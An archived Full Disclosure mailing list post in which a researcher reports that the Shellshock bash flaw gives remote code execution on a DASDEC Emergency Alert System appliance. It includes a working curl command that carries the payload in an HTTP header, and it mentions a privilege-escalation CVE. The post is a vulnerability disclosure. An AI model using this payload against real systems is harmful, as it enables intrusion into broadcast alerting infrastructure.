Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Critical bash vulnerability CVE-2014-6271

From: Matt Hazinski <mhazinsk () vt edu>
Date: Fri, 26 Sep 2014 14:02:51 -0400
On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote:

Worse that heartbleed?

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
I'm able to get remote code execution via CVE-2014-6271 on the Digital Alert Systems DASDEC. This appliance is used by broadcasters to send and receive Emergency Alert System messages over IP and AFSK. Once authenticated, an attacker can interrupt broadcasts (via a relay) and play arbitrary audio over the airwaves. 

Exploiting it only requires a malicious HTTP header:
curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable > /tmp/dumped_file' 
http://192.168.0.45/dasdec/dasdec.csp
[matt@WUVT-EAS ~]# cat /tmp/dumped_file vulnerable
Commands are executed as the apache user, but privilege escalation can still be obtained through CVE-2009-2692 despite the vendor's recent cumulative security patch.
I suspect all versions of the DASDEC are vulnerable to this, although I only have a DASDEC-1EN running software version 2.0-2 to test. 

--
Matt Hazinski
mhazinsk () vt edu

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: